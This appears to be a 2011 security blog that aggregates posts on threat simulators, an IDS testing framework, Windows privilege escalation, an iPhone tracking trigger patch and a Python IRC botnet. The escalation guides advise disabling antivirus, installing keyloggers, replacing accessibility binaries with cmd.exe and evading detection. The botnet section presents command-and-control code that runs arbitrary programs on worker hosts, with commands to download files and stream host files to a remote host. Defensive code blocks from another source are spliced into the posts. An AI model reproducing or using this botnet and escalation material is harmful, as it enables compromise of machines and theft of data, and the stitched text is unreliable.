Apr 30, 2011

RedWolf Security Threat Generator

The RedWolf Security Threat Generator is a security threat simulator that tests security system effectiveness. It can be used to perform tactical tests of your deployed security systems. Security systems include Firewalls, Intrusion Detection/Prevention Systems, Data Loss Prevention Tools, Access Control Systems, Logging & Security Information/Event Management, etc. Its threat generation capabilities include email, IM, malware, P2P, social networking, VoIP, DDoS, and many more. To give a concrete picture, the RedWolf Security Threat Generator supports the following threat generation scenarios:

Internal Scenario Categories:

  • Network Probing
  • Email Leaks
  • Instant Messaging
  • Peer to Peer
  • Protocol Tunneling/Hiding
  • Anonymizing
  • File Transfer
  • Malware Emulation
  • Honeypots
  • Social Networking
  • VOIP

External Scenario Categories:

  • Distributed Denial of Service
  • SQL Injection
  • Malware Attacks

If you want to see the full details, please go to the Source.

Source: http://www.pentestit.com/2011/04/29/redwolf-security-threat-generator/

pytbull IDS/IPS Testing Framework for Snort and Suricata

pytbull is an Intrusion Detection/Prevention System (IDS/IPS) Testing Framework for Snort and Suricata. It can be used to test the detection and blocking capabilities of an IDS/IPS, to compare IDS/IPS, to compare configuration modifications and to check/validate configurations.
The framework is shipped with about 300 tests grouped into 8 testing modules:
  1. clientSideAttacks: this module uses a reverse shell to provide the server with instructions to download remote malicious files. This module tests the ability of the IDS/IPS to protect against client-side attacks.
  2. testRules: basic rules testing. These attacks are supposed to be detected by the rules sets shipped with the IDS/IPS.
  3. badTraffic: Non RFC compliant packets are sent to the server to test how packets are processed.
  4. fragmentedPackets: various fragmented payloads are sent to server to test its ability to recompose them and detect the attacks.
  5. multipleFailedLogins: tests the ability of the server to track multiple failed logins (e.g. FTP). Makes use of custom rules on Snort and Suricata.
  6. evasionTechniques: various evasion techniques are used to check if the IDS/IPS can detect them.
  7. shellCodes: send various shellcodes to the server on port 21/tcp to test the ability of the server to detect/reject shellcodes.
  8. denialOfService: tests the ability of the IDS/IPS to protect against DoS attempts.

It is easily configurable, and new modules could be integrated in the future.
If you want to download it, please go to the Source.

Source: http://sourceforge.net/projects/pytbull/

Anonymous Message to Sony(Update)

After PSN was hacked, the hacker published some messages about Sony's database. Now Anonymous has released a message about that. Please leave a comment on this post.

AnonOps Fliers-


AnonOps Facebook-


AnonOps is not attacking PSN-


AnonOps videos-


Source: http://www.youtube.com/watch?v=d2FjS-rFSwc&feature=youtu.be

Apr 29, 2011

Windows Privilege Escalation Part 2: Domain Admin Privileges

If you want to see all the details, please go to the Source.

Escalation Techniques
Using the escalation vectors listed below, penetration testers often gain unauthorized access to all kinds of things like applications, systems, and everyone’s favorite: domain administrator accounts.
  1. Crack Local LM Password Hashes
    A long time ago, in a LAN far away, there lived a strong password stored as an LM Hash. The penetration testers of the LAN tried brute force and dictionary attacks, but it took weeks to crack the single LM password hash. The IT administrators were pleased and felt there was security across the LAN.
    I think that we’ve all heard that bedtime story before, and it’s less true now than ever. Using tools like Rainbow Tables, LM password hashes can be cracked in a few minutes instead of a few weeks. Tools like these allow penetration testers to quickly crack local, service, and in some cases domain accounts. Service and domain accounts can be especially helpful for the reasons below.
    Service Accounts
    Local service accounts are commonly installed using the same passwords across an entire environment. To make matters worse (or better, depending on your perspective), many of them allow interactive login, and in extreme cases are installed on domain controllers with Domain Admin privileges. Service accounts may seem trivial at first glance, but make sure to give them the attention they deserve; it usually pays off in the end.
  2. Impersonate Users with Pass-The-Hash Toolkit and Incognito
    Have you ever wanted to be someone else? Well, now you can. With local administrator rights to a system you can impersonate any logged-on user with the Pass-The-Hash Toolkit or Incognito tool. Both of the tools provide the functionality to list logged-on users and impersonate them on the network by manipulating LSA (Local Security Authority) logon sessions. In most cases this means domain user or administrator access. I know it’s exciting, but don’t forget to keep in mind that anti-virus and anti-malware products typically protect LSA sessions from manipulation, so they must be disabled before the tools can be used. Or for the more ambitious, modify the executable source code and recompile each program to avoid detection.
  3. Install a Keylogger
    Installing key loggers on systems is a time-honored tradition practiced by hackers for generations. They can be a great vector for gathering passwords to systems, applications, and network devices. Historically, they have been pretty easy to create and conceal. However, I still recommend disabling anti-virus services, or at least creating an anti-virus exception for certain relative files types (for example, *.exe files) before installing a
  4. Install a Sniffer on the Localhost
    Installing a network traffic sniffer is another vector of attack that has been practiced since the dawn of the Internet. As you might expect, sniffers can also be a great vector for gathering passwords to systems, applications, and network devices. Unfortunately, this is another one that will require local administrative access. It’s needed to install the WinPcap driver used to perform promiscuous sniffing of network traffic.
    Typically, the only traffic sniffed on today’s networks is broadcast traffic and traffic flowing to and from the localhost. Apparently, somewhere along the line most companies figured out that using routers and switches was a better idea than daisy-chaining hubs. Even with this limitation, sniffing traffic on the right server can yield great results, especially with the popularity of unencrypted web applications that authenticate to Active Directory. There are a number of great open-source and commercial sniffing tools out there.
  5. Sniff from Network Devices
    A few of the most common vectors of attack overlooked by penetration testers are routers and switches. Typically, both device types can copy network traffic and direct it anywhere on the network for sniffing. In some cases testers can even monitor and view traffic right on the device itself. Oddly enough, many companies don’t change the default passwords and SNMP strings that protect the management of such devices. Unfortunately for penetration testers, some companies only allow read access to device configurations, but have no fear. Many of the same devices will accept and reply to SNMP queries for the TFTP image paths. Most TFTP servers don’t use authentication, which means the image can be downloaded and the device passwords can be read or cracked to gain full access.
  6. Perform Man in the Middle (MITM) Attacks
    Ok, you caught me, I lied about only being able to sniff network traffic coming to and from the localhost. However, it was for good reason. I wanted to make the distinct point that MITM attacks are typically required to sniff network traffic flowing between remote systems on a LAN. One of the easiest ways to conduct MITM attacks is ARP spoofing. It’s a simple attack, there are lots of free tools that support it, and many companies still don’t protect against it. Explaining how ARP spoofing works will not be covered in this article, but I strongly suggest reading up on it if you are not familiar.
    There are a lot of ARP spoofing tools out there, but I don’t think that I’m alone in saying that Cain & Abel is my favorite. It makes initiating an ARP spoofing attack as easy as using Notepad. In addition, it also gathers passwords for at least 20 different applications and protocols while sniffing. The fun doesn’t stop there; it also intercepts HTTPS, RDP, and FTPS communications, making it extremely valuable even against encrypted communications. In some cases MITM attacks can be more effective than all of the other escalation vectors. It can take time to sniff the right password, but on the bright side it can be done while you’re conducting other attacks – Hooray for multi-tasking!
  7. Attack Domain Controllers Directly
    If domain controllers are in scope for your penetration test, then I recommend starting there. Gaining almost any level of user access on a domain controller typically leads to domain administrator access. If SYSTEM-level access is not immediately obtained via missing patches, weak configuration, or coding issues, then (in most cases) using the other vectors of attacks listed in Parts 1 and 2 of this series should allow you to escalate your privileges.
    Remember, SYSTEM-level access on a domain controller is equivalent to domain administrator access. SYSTEM access can be easily leveraged by penetration testers to create their own domain administrator account.
  8. Online Resources
    Never underestimate the power of public information. Public registrars are a great place to find company contacts, business partners, IP Addresses, and company websites. All of which can lead to valuable information such as internal procedures, configuration files, patch levels and passwords. There have been many occasions when I’ve found internal installation procedures containing passwords on company websites, forums, and blogs.
    Once passwords have been found, use externally accessible login interfaces to gain access to systems and sensitive information.
  9. Buy Used Computer Equipment
    Going once, going twice, sold to the highest bidder. Sensitive information like social security numbers, credit card numbers, and account passwords are being sold every day in a neighborhood near you. Companies sell their used POS terminals, workstations, servers, and network equipment all the time. However, what many of them don’t do is take the time to securely wipe the disks. As a result, sensitive data is flying around eBay, Craigslist, and your local auction house. I’ve personally seen POS terminals storing thousands of card numbers in clear text. Even worse, I’ve seen firewalls with configurations that allow the buyer direct VPN access to the corporate network of the company that sold the devices.
  10. Social Engineering
    Sometimes the easiest way to gain domain administrative privileges is to never touch a computer. If you’re part of the security community you already know what social engineering is, and what the common vectors are. However, this may be a new concept for some people, so I’ll provide a brief overview.
    In a nutshell, social engineering is the process of manipulating people into providing information or performing actions. Although there are many types of social engineering attacks, there are three primary vectors: in person, phone-based, and the most common, email phishing. At this point you may still be wondering how this is going to result in domain administrator access. So I’ve provided an example for each vector below.

If you want to see all the details, please go to the Source.

Source: http://www.netspi.com/blog/2009/10/05/windows-privilege-escalation-part-2-domain-admin-privileges/

Disabling iPhone Tracking: Do it Yourself (DiT:DiY)

Another way to disable iPhone tracking. Full details are in the Source.

Trying to disable the threats on non-jailbroken iPhones

A nice proposition was published by Dominic White on his blog ( http://singe.za.net/blog/archives/1029-Quick-note-on-the-iPhone-Location-Tracking-Disclosure.html ). Basically, he explains that you can take the latest backup of your iPhone, open this file to extract the unwanted "consolidated.db" file. Then if you modify it, re-insert it in the backup, and ask iTunes to do a recovery of your iPhone from this latest (modified) backup, you'll have fake data on a non-jailbroken iPhone!

This is quite a good article, with technical details about how to play with the backup issues, file extraction, etc.

To quote this blog again, one limitation would then be that you would have to do all those steps regularly, in order to clean the new location data that gets written on the iPhone. What a pain..

Disabling iPhone Tracking, Do it Yourself :-)

Here is our humble solution for non-jailbroken iPhones. On such a device, we can't delete/shred the consolidated.db file. We can't add programs on the iPhone (for classical end-users) that would add security. We can't modify permissions on the file system. We can't do so many things, as it's a non-jailbroken iPhone.

So, for those who are forced to live with the file "consolidated.db" itself, TEHTRI-Security proposes to patch this Apple file, and to add some lines of hacking inside it. We found that by adding
SQL TRIGGERS inside the file itself, we can totally get rid of the tracking issues.

Our technique is quite simple: each time the iPhone tries to insert data into this (malicious?) database, "consolidated.db", we delete all entries of the tables. How can we do that, as we have no evil process running on a non-jailbroken iPhone? As we wrote previously, there is an SQL feature, well known by hackers, which is called TRIGGERS. It's a way to have an automatic action played each time a specific database event is seen.

At TEHTRI-Security, we have used TRIGGERS tons of times in our penetration tests in highly sensitive environments, with customers who wanted to see if automatic evil things could happen in their databases, ERP, etc. Here it's cool to see that TRIGGERS can also be used for positive things, as it might help those of you who really need to avoid privacy issues.

SQLite3 TRIGGER Patch examples:
create trigger privacy_in_WifiLocationHarvest after insert on WifiLocationHarvest begin delete from WifiLocationHarvest; end;

create trigger privacy_in_LocationHarvest after insert on LocationHarvest begin delete from LocationHarvest; end;
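As an added example (not TEHTRI-Security's code), the following shows what the two triggers above do on an in-memory SQLite database: every INSERT into a harvest table fires an AFTER INSERT trigger that empties that table, so the harvested rows never persist. The post does not reproduce the real consolidated.db schema, so the table layouts below are assumed and the inserted location rows are constructed.

```python
import sqlite3

# Assumed minimal layout of the two tables the post's triggers target; the real
# consolidated.db schema is not given on the page.
SCHEMA = """
CREATE TABLE WifiLocationHarvest (MAC TEXT, Timestamp REAL, Latitude REAL, Longitude REAL);
CREATE TABLE LocationHarvest (Timestamp REAL, Latitude REAL, Longitude REAL);
"""

# The trigger patch from the post, unchanged apart from line breaks.
TRIGGER_PATCH = """
create trigger privacy_in_WifiLocationHarvest after insert on WifiLocationHarvest
    begin delete from WifiLocationHarvest; end;
create trigger privacy_in_LocationHarvest after insert on LocationHarvest
    begin delete from LocationHarvest; end;
"""

TABLES = ("WifiLocationHarvest", "LocationHarvest")


def open_db(patched: bool) -> sqlite3.Connection:
    """Build a fresh database, optionally with the privacy triggers applied."""
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    if patched:
        con.executescript(TRIGGER_PATCH)
    return con


def simulate_harvest(con: sqlite3.Connection, n: int = 5) -> dict:
    """Insert n constructed rows into each table, the way locationd would write
    them, and return the row count per table afterwards."""
    for i in range(n):
        con.execute("INSERT INTO WifiLocationHarvest VALUES (?, ?, ?, ?)",
                    (f"00:11:22:33:44:{i:02x}", 1304000000.0 + i, 1.29 + i / 1000, 103.85))
        con.execute("INSERT INTO LocationHarvest VALUES (?, ?, ?)",
                    (1304000000.0 + i, 1.29 + i / 1000, 103.85))
    con.commit()
    return {t: con.execute(f"SELECT COUNT(*) FROM {t}").fetchone()[0] for t in TABLES}


def list_triggers(con: sqlite3.Connection) -> list:
    """Names of the triggers present, i.e. what to check after deploying the
    patched file to confirm the patch survived the round trip."""
    rows = con.execute("SELECT name FROM sqlite_master WHERE type = 'trigger'")
    return sorted(r[0] for r in rows)


if __name__ == "__main__":
    print("unpatched:", simulate_harvest(open_db(False)))   # 5 rows per table
    print("patched:  ", simulate_harvest(open_db(True)))    # 0 rows per table
    print("triggers: ", list_triggers(open_db(True)))
```

The same check as list_triggers can be run against the real file with sqlite3 consolidated.db '.schema' to confirm both triggers are present before deploying it.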

Of course, you could also wait for the future Apple feature that will let you delete the cache of locations on your iPhone. But if you don't want to wait, and if you want to destroy those lines of data each time the iPhone tries to write them, then you can try our solution.

Of course, TEHTRI-Security cannot be held responsible for anything bad that would happen because of false manipulations on your devices. Do things carefully and of course follow the laws & licence issues in your countries.

Here are the steps that can be followed:

1- Download

2- Rebuild your own consolidated.db file by applying our previous SQL file

sqlite3 consolidated.db '.read /Users/idev/iphone/tehtris-iphone-privacy.sql'

3- Deploy this new patched "consolidated.db" file containing our TRIGGER tricks, which will delete everything from this database each time the iPhone moves even its smallest finger..

Non-Jailbroken devices: use iTunes recovery as explained before (check the blog of Dominic White for the whole process).

Jailbroken devices: if you prefer our solution, that does not run a new process in the background (compared to the "untrackerd" solution) with live automatic deletion, you just have to copy the new patched consolidated.db

$ scp consolidated.db root@your-jailbroken-iphone:/private/var/root/Library/Cache/locationd/consolidated.db

We hope this tiny article will help some people seeking native, easy solutions with standard tools, who need a stronger level of privacy. Of course, this is just a quick article with pointers to most of the needed concepts. You'll have to dig yourself if you want to build your own stuff based on our TRIGGER Patch solution.

Notice that TEHTRI-Security has landed in Singapore this week, to join the awesome SyScan 2011 event led by Thomas Lim and his team. Last year, at SyScan 2010, we published 13 0days, with ways to counter-attack exploit kits (tools like Eleonore, Zeus, SpyEye..). This year, we will focus on tricks and attacks related to web clients, smartphones, etc. (http://www.syscan.org). There will be many other tremendous talks given by sharp speakers dealing with IT Security and smartphones (like S.Esser!).

Should be a hot week here. Do not hesitate to join us here in Singapore, especially if you want more information about privacy issues on phones, attack/defense issues, etc.

Source: http://blog.tehtri-security.com/2011/04/disabling-iphone-tracking-do-it.html

Windows Privilege Escalation Part 1: Local Administrator Privileges

If you want the full details, please go to the Source.

The process of stealing another Windows user’s identity may seem like black magic to some people, but in reality any user who understands how Windows works can pull it off. This is the first of two blog entries giving an overview of privilege escalation techniques that prove that fact. Part 1 (this entry) discusses obtaining local SYSTEM and administrative privileges from an unprivileged user account, and Part 2 will focus on obtaining domain administrative privileges from local administrator or domain user accounts.

Escalation Techniques
Weak configurations and missing patches often lead to local user and service account access. Sometimes these accounts can be used to access sensitive information directly, but usually access to the affected systems and connected networks doesn’t stop there. Using the 10 escalation vectors listed below, penetration testers can often gain unauthorized access to databases, network devices, and other systems on the network.

  1. Clear Text Passwords Stored in Files
    Never underestimate the efficiency of IT administrators. In their quest to play more Halo, most administrators have automated a large number of their processes and made their systems as homogeneous as possible. Although this sounds like a dream come true, the red team isn’t the only one in the crosshairs. The scripts used to automate processes and connect to databases often include clear text user names and passwords that can be used to gain unauthorized access to systems and applications. Also, because most of their systems are built from the same image, finding a security issue on one system is like finding it on all of them.
    So, while doing penetration tests, take the time to pick the low hanging fruit. Checking local files for sensitive credentials can be one of the easiest ways to escalate privileges. Personally, I recommend using Spider 2008 for the task. It is a great open-source tool created by the folks at Cornell University that will accept custom regex and can be used to search for sensitive information on systems, shares, and websites.
  2. Clear Text Passwords Stored in the Registry
    The registry is a hidden treasure chest of passwords and network paths. Application developers and system administrators leverage it for all kinds of interesting things, but they don’t always use encryption when they should. So spend some time browsing for passwords and network paths that could lead to secret stashes of sensitive data. I encourage people to write their own scripts or use an automated tool to search the registry for sensitive information, but feel free to use the find function in regedit if your fingers need a little exercise.
  3. Write Access to the System32 Directory
    By default, unprivileged users do not have write access to the system32 directory in Windows operating systems. However, many older applications and misguided system administrators change the permissions to avoid access errors and ensure smooth operations. Unfortunately, the result of their good intentions also allows penetration testers to avoid access errors and ensure smooth privilege escalation to local SYSTEM.
    Specifically, accessibility programs such as system32\sethc.exe (Sticky Keys) and system32\utilman.exe (Windows Utility Manager) can be used to gain SYSTEM level access by replacing their executables with cmd.exe. This works because Windows doesn’t perform any file integrity checks on those files prior to login. As a result, users can create a local administrator account and disable anti-virus, among many other creative possibilities.
    This is one of my favorites. I hope you enjoy it as much as I have.
  4. Write Access to the All Users Startup Folder
    Every user on a Windows operating system has his or her own Windows startup folder that is used to start programs just for them when they log on. As luck would have it, there is also a Windows startup folder that contains programs that run for (you guessed it) ALL users when they log on. If unprivileged users have the ability to write to that directory, they can escalate their privileges on the local system and potentially the network by placing an evil executable or script in the directory and tricking a trusting user into logging into their machine.
    If your penetration test allows for a little bit of social engineering, I recommend calling up the help desk and asking them to sign into your system in order to help with a random computer issue. The help desk team usually has the privileges to add, edit, and remove local and domain users.
  5. Insecurely Registered Executables
    When a program is installed as a Windows service or logon application, it is required to register with Windows by supplying a path to the program’s executable. If it is not registered securely, penetration testers may be able to escalate their privileges on the system by running commands under the context of the service user. Specifically, if a registered path contains spaces and is not enclosed in quotes, penetration testers may be able to execute their own program based on the registered executable path.
    Insecurely registered executables can be an easy, low-impact way to gain SYSTEM level access on a system. Although insecurely registered executables can be identified manually, I recommend using some of the automated tools available for free on the internet.
  6. Windows Services Running as SYSTEM
    Lots of services run as SYSTEM, but not all of them protect their files and registry keys with strong access controls. In some cases SYSTEM-level access can be obtained by overwriting files and registry keys related to SYSTEM services. For example, overwrite an executable used by a SYSTEM service with cmd.exe. If the overwrite is successful, then the next time the service calls the executable, a SYSTEM console will open. Modifying configuration files and performing DLL injection have also proven to be effective techniques.
    No super-secret tools are needed for this vector of attack; Windows Explorer or a command console should do.
  7. Weak Application Configurations
    I’ve found weak application configurations during every penetration test I’ve ever done, and in many cases they can be leveraged to gain SYSTEM-level access. Even in an age of application hardening guides and industry compliance requirements, I regularly find applications like IIS and MSSQL running as SYSTEM instead of a least privilege service account.
    I recommend doing some research on the applications installed on your target systems to determine how best to leverage their configurations.
  8. Windows At Command
    I know this is an oldie, but it’s still worth mentioning, because oddly enough there are some environments out there running unpatched versions of WinNT and Windows 2000. So, for those who have not used this technique before, it may still be useful.
    The “AT” command is a tool that is used to schedule tasks in Windows. By default, in earlier versions of the Windows operating system the “AT” command was run as SYSTEM. As a result, users can gain access to a console with SYSTEM access when they schedule the cmd.exe as a task.
  9. Install a User-Defined Service
    In some cases Windows users may have excessive rights that allow them to create services on the system using the Instsrv.exe and Srvany.exe tools that come with the Windows NT resource kit. Instsrv.exe is used to install a program as a service, and Srvany.exe is used to run the program as a service. By default, the services installed with instsrv.exe should be configured to automatically start at boot time. However, you can also use the sc.exe command to ensure that it is configured how you want it. Either way, a restart may be required depending on your existing privileges. I’ve personally seen users in the “Power Users” group with the ability to install their own services, but it may be a coincidence.
    I recommend creating a Metasploit binary that adds a local administrator to the system, and using it to create the service. It’s easy, and the new administrator account can be used to sign in via remote desktop. However, if that’s not your cup of tea, feel free to use your favorite payloads.
  10. Local and Remote Exploits
    Managing and distributing patches for third-party software seem to be among the greatest challenges facing IT today. This is bad news for IT, but good news for penetration testers, because it leaves vectors of attack open. Exploiting local and remote vulnerabilities can provide SYSTEM-level access with very little effort, and—with a little luck—domain administrator access. However, they can have some negative impacts on sensitive systems, like crashing them. If that is not a problem in the environment you’re working in, then more power to you. However, if you’re working with people who don’t like their systems to crash unexpectedly, then take the time to understand the exploits and avoid using the ones that have a history of negative effects.
    There are a number of great open-source and commercial toolsets available for exploiting known software vulnerabilities. However, the frontrunners seem to be Metasploit, Canvas, and Core Impact. They all have a variety of options and exploits, but I recommend using the one that fits your immediate needs and budget.
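As an added example (not NetSPI's code), here is the defender-side check for vector 5 above, insecurely registered executables: it takes service ImagePath values, flags the ones whose unquoted executable path contains spaces, and returns the quoted form an administrator should set instead. The service names, vendors and paths in the sample are constructed.

```python
import re

# Constructed sample of HKLM\SYSTEM\CurrentControlSet\Services\<name>\ImagePath
# values as an inventory script might dump them (fictional services and vendors).
SAMPLE_IMAGE_PATHS = {
    "SvcHostNet":  r"C:\Windows\system32\svchost.exe -k netsvcs",
    "GoodQuoted":  r'"C:\Program Files\Example Vendor\Agent\agent.exe" /service',
    "BadUnquoted": r"C:\Program Files\Example Vendor\Agent\agent.exe /service",
    "BadNoArgs":   r"C:\Program Files (x86)\Other Vendor\Updater Service\upd.exe",
    "NoSpaceArgs": r'C:\Apps\svc.exe -config "C:\Program Files\x.ini"',
}

# An unquoted value is read up to the first ".exe"; whatever follows is arguments.
_EXE_SPLIT = re.compile(r"^(?P<exe>.*?\.exe)(?P<rest>\s.*)?$", re.IGNORECASE)


def split_image_path(image_path: str):
    """Return (executable, arguments) for an ImagePath value."""
    p = image_path.strip()
    if p.startswith('"'):
        end = p.find('"', 1)
        if end == -1:  # unterminated quote: treat the whole value as the path
            return p.strip('"'), ""
        return p[1:end], p[end + 1:].strip()
    m = _EXE_SPLIT.match(p)
    if not m:  # not an .exe path (e.g. a kernel driver .sys); out of scope here
        return p, ""
    return m.group("exe"), (m.group("rest") or "").strip()


def is_unquoted_service_path(image_path: str) -> bool:
    """True when the value is unquoted and its executable portion contains a
    space, i.e. the path the service control manager has to resolve by trying
    each space-delimited prefix as a program name."""
    p = image_path.strip()
    if p.startswith('"'):
        return False
    exe, _ = split_image_path(p)
    return " " in exe


def quote_image_path(image_path: str) -> str:
    """The hardened form of the value: executable in quotes, arguments after it."""
    if not is_unquoted_service_path(image_path):
        return image_path.strip()
    exe, args = split_image_path(image_path)
    return f'"{exe}" {args}'.rstrip()


def audit(image_paths: dict) -> dict:
    """Map each insecurely registered service to the ImagePath it should have."""
    return {name: quote_image_path(path)
            for name, path in image_paths.items()
            if is_unquoted_service_path(path)}


if __name__ == "__main__":
    for name, fixed in audit(SAMPLE_IMAGE_PATHS).items():
        print(f"{name}: set ImagePath to {fixed}")
```

On a live host the corrected value is applied with sc config <service> binPath= "<quoted path and arguments>", and the directories along the path should be checked for write permissions granted to non-administrators.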

Source: http://www.netspi.com/blog/2009/10/05/windows-privilege-escalation-part-1-local-administrator-privileges/

A simple botnet written in Python

If you want to see all the details of this howto, please go to the Source.

How it works

It's not very complicated! I was already familiar with some of the rudiments of the IRC protocol from hacking on a simple IRC bot library. The parts that I needed to figure out were:
  • ability to track when workers came on/off-line so they could be sent jobs
  • easily pass data from operator -> workers and back again

Worker registration

The diagram below shows the process of registration that happens when a worker comes online. Workers must know beforehand the nick of the command program (or have a way of finding it out) -- they then send a private message to the command program indicating their presence. The command program acknowledges this, adds the worker's nick to the registry of available workers, and sends the worker the location of the command channel. The worker then joins the channel and is able to start executing tasks from the operator.
In the event a worker comes online and cannot reach the command program, it will keep trying every 30 seconds until it receives an acknowledgement. Additionally, every two minutes the command program pings the workers, removing any dead ones from the list.

Task execution

Tasks are initially parsed by the command program and then dispatched to workers via the command channel. The operator can specify any number of workers to set to work on a specific task. The syntax is straightforward:
!execute (<number of workers>) <command> <arguments>
Below is a diagram of the basic workflow:
Worker tasks are parsed by the worker bot and can accept any number of arbitrary arguments, which are extracted by an operator-defined regex. Here's an example of how the "run" command looks (which executes a command on the host machine):
def get_task_patterns(self):
    return (
        ('run (?P<program>.*)', self.run),
        # ... any other command patterns ...
    )

def run(self, program):
    # os.popen runs the program on the worker host and returns a file handle
    # for its output (requires "import os" at the top of the module)
    fh = os.popen(program)
    return fh.read()
Dead simple! Tasks can return any arbitrary text which is then parsed by the worker's task runner and sent back to the command program. At any time, the operator can request the data for a given task.

A note on security

The operator must authenticate with the command program to issue commands - the password is hardcoded in the BotnetBot. Likewise, workers will only accept commands from the command program.

Example session

Below is a sample session. First step is to authenticate with the bot:
<cleifer> !auth password
<boss1337> Success

<cleifer> !status
<boss1337> 2 workers available
<boss1337> 0 tasks have been scheduled
Execute a command on one of the workers:
<cleifer> !execute 1 run vmstat
<boss1337> Scheduled task: "run vmstat" with id 1 [1 workers]
<boss1337> Task 1 completed by 1 workers
Print the data returned by the last executed command:
<cleifer> !print
<boss1337> [workerbot:{alpha}] - run vmstat
<boss1337> procs -----------memory---------- ---swap-- -----io---- -system-- ----cpu----
<boss1337> r  b   swpd   free   buff  cache   si   so    bi    bo   in   cs us sy id wa
<boss1337> 0  0      0 352900 583696 1298868    0    0    16    31  133  172  4  2 94  0
Find open ports on the workers hosts:
<cleifer> !execute ports
<boss1337> Scheduled task: "ports" with id 2 [2 workers]
<boss1337> Task 2 completed by 2 workers
<cleifer> !print
<boss1337> [workerbot:{alpha}] - ports
<boss1337> [22, 80, 631]
<boss1337> [workerbot_346:{rho}] - ports
<boss1337> [22, 80]
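As an added example (not part of the original post or of the tool's code), here is the defender's view of the two sections above: a parser that walks a channel log in the "<nick> text" transcript format shown, recognises the operator grammar (!auth, !status, !execute (<number of workers>) <command> <arguments>, !print) and the command program's "Scheduled task" acknowledgements, and reports who acted as operator, which nick acted as command program, and which tasks were scheduled. The log lines, nicks and password are constructed.

```python
import re

# Constructed IRC channel log in "<nick> text" form, modelled on the session
# transcripts in the post; nicks, password and the bystander line are made up.
SAMPLE_LOG = """\
<cleifer> !auth password
<boss1337> Success
<cleifer> !status
<boss1337> 2 workers available
<boss1337> 0 tasks have been scheduled
<cleifer> !execute 1 run vmstat
<boss1337> Scheduled task: "run vmstat" with id 1 [1 workers]
<boss1337> Task 1 completed by 1 workers
<someone> anyone around?
<cleifer> !execute ports
<boss1337> Scheduled task: "ports" with id 2 [2 workers]
<boss1337> Task 2 completed by 2 workers
<cleifer> !print
"""

# Operator side: the "!<command> ..." grammar described in the post.
OPERATOR = re.compile(
    r"^<(?P<nick>[^>]+)>\s+!(?P<cmd>auth|status|execute|print)(?:\s+(?P<args>.*))?$")
# "!execute (<number of workers>) <command> <arguments>": the count is optional.
EXECUTE = re.compile(r"^(?:(?P<count>\d+)\s+)?(?P<task>\S+)(?:\s+(?P<task_args>.*))?$")
# Command-program side: the acknowledgement that ties a task string to an id.
SCHEDULED = re.compile(
    r'^<(?P<nick>[^>]+)>\s+Scheduled task: "(?P<task>[^"]*)" with id (?P<tid>\d+) '
    r'\[(?P<n>\d+) workers\]$')


def parse_log(text: str) -> dict:
    """Single pass over the log: operators seen, nicks acting as the command
    program, number of !auth attempts, every !execute as (nick, count, task),
    and scheduled tasks as id -> (task string, workers assigned)."""
    report = {"operators": set(), "command_bots": set(), "auth_attempts": 0,
              "executes": [], "scheduled": {}}
    for line in text.splitlines():
        m = OPERATOR.match(line)
        if m:
            report["operators"].add(m["nick"])
            if m["cmd"] == "auth":
                report["auth_attempts"] += 1
            elif m["cmd"] == "execute" and m["args"]:
                e = EXECUTE.match(m["args"].strip())
                count = int(e["count"]) if e["count"] else None  # None: all workers
                task = e["task"] + (" " + e["task_args"] if e["task_args"] else "")
                report["executes"].append((m["nick"], count, task))
            continue
        m = SCHEDULED.match(line)
        if m:
            report["command_bots"].add(m["nick"])
            report["scheduled"][int(m["tid"])] = (m["task"], int(m["n"]))
    return report


def flag_run_tasks(report: dict) -> list:
    """The 'run ...' tasks execute arbitrary commands on the worker hosts, so
    they are the ones to escalate first."""
    return [task for _, _, task in report["executes"] if task.startswith("run ")]


if __name__ == "__main__":
    r = parse_log(SAMPLE_LOG)
    print("operators:", r["operators"], "command program:", r["command_bots"])
    print("scheduled:", r["scheduled"])
    print("run tasks:", flag_run_tasks(r))
```

The same patterns apply to PRIVMSG lines of a raw IRC capture once the sender nick and message text have been extracted.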

Becoming a bot herder

If you'd like to try this out yourself, feel free to grab a checkout of the source, available on GitHub (please go to the Source). The worker is programmed with the following commands:
  • run executes the given program
  • download will download the file at the given url and save it to the host machine
  • info returns information about the host machine's operating system
  • ports does a quick port-scan of the system ports 20-1025
  • send_file streams the file on the host computer to the given host:port
  • status returns the size of the worker's task queue
Adding your own commands is really easy, though -- just add them to the tuple returned by the get_task_patterns method, which looks like this:
def get_task_patterns(self):
    return (
        ('download (?P<url>.*)', self.download),
        ('info', self.info),
        ('ports', self.ports),
        ('run (?P<program>.*)', self.run),
        (r'send_file (?P<filename>[^\s]+) (?P<destination>[^\s]+)', self.send_file),
        ('status', self.status_report),

        # adding another command - this will return the system time and optionally
        # take a format parameter
        ('get_time(?: (?P<format>.+))?', self.get_time),
    )
Now define your callback, which will perform whatever task you like and optionally return a string. The returned data will be sent to the command program and made available to the operator.
def get_time(self, format=None):
    now = datetime.datetime.now() # remember to import datetime at the top of the module
    if format:
        return now.strftime(format)
    return str(now)
Here's how you might call that command:
<cleifer> !execute get_time
<boss1337> Scheduled task: "get_time" with id 1 [1 workers]
<boss1337> Task 1 completed by 1 workers
<cleifer> !print 1
<boss1337> [workerbot:{alpha}] - get_time
<boss1337> 2011-04-21 10:41:16.251871
<cleifer> !execute get_time %H:%M
<boss1337> Scheduled task: "get_time %H:%M" with id 2 [1 workers]
<boss1337> Task 2 completed by 1 workers
<cleifer> !print
<boss1337> [workerbot:{alpha}] - get_time %H:%M
<boss1337> 10:42
The bots are extensible, so you can write your own commands if you want to take up bot-herding. The same tool could be used to restart web nodes, update checkouts or report on status; since the run command executes arbitrary programs, it can do anything the worker's account can.
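To make the pattern-to-callback mechanism concrete, here is a self-contained stand-in for the worker's dispatch loop. This is an added example, not code from the project: the IRC plumbing and the run/download/ports commands are left out so the dispatch logic can be run on its own, and the echo command is invented for the demonstration. The get_time callback is the one described above.

```python
import datetime
import re


class Worker:
    """Stand-in for the worker's command dispatch (example, not the project's code).

    Task strings are matched, in order, against the patterns returned by
    get_task_patterns(); the named groups of the first pattern that matches
    the whole string become the callback's keyword arguments.
    """

    def __init__(self):
        self.task_queue = []
        # Compile each pattern once, keeping the tuple's order: the first
        # pattern that matches the whole task string wins.
        self.patterns = [(re.compile(p), cb) for p, cb in self.get_task_patterns()]

    def get_task_patterns(self):
        return (
            ('status', self.status_report),
            ('echo (?P<text>.+)', self.echo),          # invented for the example
            # optional argument: the group is None when the operator omits it
            ('get_time(?: (?P<format>.+))?', self.get_time),
        )

    def dispatch(self, task):
        """Run the task and return the callback's string, or None if nothing matches."""
        for regex, callback in self.patterns:
            # fullmatch() rather than match(): "status report" must not be
            # treated as "status" with trailing junk.
            m = regex.fullmatch(task)
            if m is None:
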